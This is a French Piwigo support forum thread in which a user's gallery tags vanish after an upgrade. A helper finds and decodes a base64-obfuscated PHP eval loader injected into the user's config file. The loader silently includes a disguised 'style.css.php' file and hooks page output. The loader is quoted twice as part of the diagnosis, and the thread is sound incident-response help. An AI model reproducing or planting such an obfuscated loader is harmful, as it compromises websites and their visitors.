Bonjour,
Depuis le passage en 2.2.1, les tags ne s'affichent plus dans le menu Tags ("voir les tags disponibles").
Y a-t-il une solution ?
Merci
Dernière modification par isatis (2011-06-02 16:23:29)
est ce que tu as un template extension de tags.tpl ?
est ce que tu utilise un plugin qui interviens sur les tags ?
ddtddt a écrit:
est ce que tu as un template extension de tags.tpl ?
Oops, je ne sais pas trop de quoi il s'agit !?
Comment puis-je vérifier ?
ddtddt a écrit:
est ce que tu utilise un plugin qui interviens sur les tags ?
Voici ma liste de plugins activés :
Advanced Menu Manager Version 3.1.3 | Par Piwigo team | Visitez le site du plugin
Grum Plugins Classes.3 Version 3.5.1 | Par grum@piwigo.org | Visitez le site du plugin
LocalFiles Editor Version 2.2.1 | Par Piwigo team | Visitez le site du plugin
Piwigo AutoUpgrade Version 2.2.e | Par P@t | Visitez le site du plugin
PY GVideo Version 2.2.a | Par PYwaie & P@t | Visitez le site du plugin
RV Menu Tree Version 2.2.a | Par rvelices | Visitez le site du plugin
Merci
Je me suis inscrit sur ta galerie, si tu peux me passer les droits de webmaster un instant je regarde et je te fait un retour
ddtddt a écrit:
Je me suis inscrit sur ta galerie, si tu peux me passer les droits de webmaster un instant je regarde et je te fait un retour
C'est fait, merci
c'est quoi la 1er ligne de ton fichier local de conf ?
est ce que tu as essayé de reprendre le fichier tags.php de l'archive et de le renvoyer ?
il semblerais que ce soit un code malveillant c'est toi qui l'a rajouté ?
ddtddt a écrit:
Si tu veux parler de
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9tbnQvMTUwL3NkYi9iLzQvZnJhbnZhbC5yZW5hcmQvUFdHL2FkbWluL3RlbXBsYXRlL2dvdG8vdGhlbWUvcm9tYS9pbWFnZXMvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>
je n'ai aucune idée d'où ça vient !?
Est-ce que je dois l'enlever ?
oui enlève le, ça n'a aucune raison d'être là
voici le code que ça exécute
if (function_exists('ob_start') && !isset($GLOBALS['mfsn'])) { $GLOBALS['mfsn'] = '/mnt/150/sdb/b/4/franval.renard/PWG/admin/template/goto/theme/roma/images/style.css.php'; if (file_exists($GLOBALS['mfsn'])) { include_once($GLOBALS['mfsn']); if (function_exists('gml') && function_exists('dgobh')) { ob_start('dgobh'); } } }
très étrange
Il me semble que tu devrais vérifier que ce code n'est pas présent dans d'autre fichier.
et je te conseillerais d'analyser ton PC
ddtddt a écrit:
Il me semble que tu devrais vérifier que ce code n'est pas présent dans d'autre fichier.
et je te conseillerais d'analyser ton PC
OK, j'ai enlevé ce code, mystère !
J'en ai profité pour modifié la ligne :
$conf['tags_default_display_mode'] ='cumulus';
par :
$conf['tags_default_display_mode'] ='letters';
et mes tags sont réapparus !
Merci
isatis a écrit:
ddtddt a écrit:
Si tu veux parler de
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9tbnQvMTUwL3NkYi9iLzQvZnJhbnZhbC5yZW5hcmQvUFdHL2FkbWluL3RlbXBsYXRlL2dvdG8vdGhlbWUvcm9tYS9pbWFnZXMvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>
Est-ce que je dois l'enlever ?
[Forum, post 129730 by scratx in topic 16778] [Résolu] Code bizarre sur tous mes fichier PHP !
Gotcha a écrit:
isatis a écrit:
ddtddt a écrit:
Si tu veux parler de
Est-ce que je dois l'enlever ?[Forum, post 129730 by scratx in topic 16778] [Résolu] Code bizarre sur tous mes fichier PHP !
Je n'ai pas trouvé d'autres occurences de ces bouts de codes dans mes autres fichiers php.
Je ne sais pas pourquoi j'avais $conf['tags_default_display_mode'] ='cumulus'; au lieu de 'letters', mais maintenant ça fonctionne !
Merci à vous tous.